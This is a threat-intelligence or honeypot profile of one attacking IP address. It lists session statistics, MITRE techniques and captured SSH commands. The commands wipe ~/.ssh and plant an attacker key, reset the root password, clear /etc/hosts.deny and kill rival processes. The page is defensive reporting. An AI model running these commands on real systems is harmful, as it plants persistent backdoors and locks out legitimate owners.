← Back to feed
118.145.235.60
Location
🇨🇳 CN
ASN
AS137718 · Beijing Volcano Engine Technology Co., Ltd.
Cloud Provider
—
Total Events
132
Above average by volume
Agent Count
1
First / Last Seen
2026-04-07 12:11 — 2026-04-07 12:32
Attack Types
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Persistence
Defense Evasion
Command and Control
External Corroboration
Not flagged by any external feeds
Session Forensics
Sessions
20 (4 with login)
Avg Depth Score
0.3
Commands Executed
22
Files Downloaded
3
Notable Commands
- cd ~; chattr -ia .ssh; lockr -ia .ssh
- lockr -ia .ssh
- cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
- cat /proc/cpuinfo | grep name | wc -l
- echo "root:AmArASMzyPTM"|chpasswd|bash
- rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
- free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
- ls -lh $(which ls)
- which ls
- crontab -l
Fingerprints
HASSH
SSH Client
Evidence Timeline
Scanner
8f3ef566be11
15%
Loading events...
Credential Harvester
e08543ac33b9
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
7e50bf024c29
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
09165cc38788
15%
Loading events...
Scanner
ea495446059b
15%
Loading events...
Scanner
66ef04966efb
15%
Loading events...
Scanner
918a850230d6
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
2b6fc01dfbb6
15%
Loading events...
Malware Dropper
e5ed5bfea240
LOGIN
19
2
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:AmArASMzyPTM"|chpasswd|bash
Scanner
793a65d77f7e
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
fe80df320cfc
15%
Loading events...
Scanner
ebcbccead768
15%
Loading events...
Scanner
54a98e432662
15%
Loading events...
Opportunistic Bruter
e7bf95964ef5
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
73740eb0aafc
15%
Loading events...
Malware Dropper
cd2b599aeadc
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
eb8a6dc1c028
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
18a82269b27c
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
e92953ba17d5
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
b4df39720577
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1